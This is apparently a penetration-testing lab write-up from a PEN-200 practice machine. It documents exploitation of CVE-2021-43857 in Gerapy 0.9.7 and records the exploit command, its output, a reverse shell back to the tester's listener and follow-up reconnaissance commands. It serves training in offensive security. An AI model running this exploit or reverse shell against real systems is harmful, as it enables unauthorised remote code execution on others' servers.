CVE-2021-43857
The target Gerapy instance appears to be vulnerable to CVE-2021-43857 due to its outdated version; 0.9.7
Initial Fail
/Practice/Levram/3-Exploitation/attachments/{D42B85BE-6B5C-44E3-95BE-7E3B64E5E414}.png)
Initial exploit attempt fails
This might be due to the fact that there is no project
Creating a Project
/Practice/Levram/3-Exploitation/attachments/{C0575E62-C000-4A41-A5ED-55DBD210E9EE}.png)
/Practice/Levram/3-Exploitation/attachments/{9DB85755-D5F1-4294-ABB1-312B91CB3345}.png)
/Practice/Levram/3-Exploitation/attachments/{69B8DBA6-0ED8-4A25-BD4C-3B2D93217676}.png)
Creating an arbitrary project
Exploitation
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/levram]
└─$ python3 CVE-2021-43857.py -t $IP -p 8000 -L $tun0 -P 8000
______ _______ ____ ___ ____ _ _ _ _____ ___ ____ _____
/ ___\ \ / / ____| |___ \ / _ \___ \/ | | || ||___ / ( _ ) ___|___ |
| | \ \ / /| _| _____ __) | | | |__) | |_____| || |_ |_ \ / _ \___ \ / /
| |___ \ V / | |__|_____/ __/| |_| / __/| |_____|__ _|__) | (_) |__) |/ /
\____| \_/ |_____| |_____|\___/_____|_| |_||____/ \___/____//_/
Exploit for CVE-2021-43857
For: Gerapy < 0.9.8
[*] Resolving URL...
[*] Logging in to application...
[*] Login successful! Proceeding...
{'Authorization': 'Token de90d5d38d4b03f5448c5823284ecd8d428dbb9b'}
[*] Getting the project list
[{"name": "CVE-2021-43857"}]
[*] Found project: CVE-2021-43857
[*] Getting the ID of the project to build the URL
[*] Found ID of the project: 3
[*] Setting up a netcat listener
listening on [any] 8000 ...
[*] Executing reverse shell payload
[*] Watchout for shell! :)
connect to [192.168.45.249] from (UNKNOWN) [192.168.206.24] 34150
bash: cannot set terminal process group (844): Inappropriate ioctl for device
bash: no job control in this shell
app@ubuntu:~/gerapy$
app@ubuntu:~/gerapy$
app@ubuntu:~/gerapy$ whoami
whoami
app
app@ubuntu:~/gerapy$ hostname
hostname
ubuntu
app@ubuntu:~/gerapy$ ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
3: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:9e:39:1b brd ff:ff:ff:ff:ff:ff
altname enp3s0
inet 192.168.206.24/24 brd 192.168.206.255 scope global ens160
valid_lft forever preferred_lft foreverExecuting the modified exploit script with a newly created project. It works this time.
Initial Foothold established to the target system as the app account via exploiting CVE-2021-43857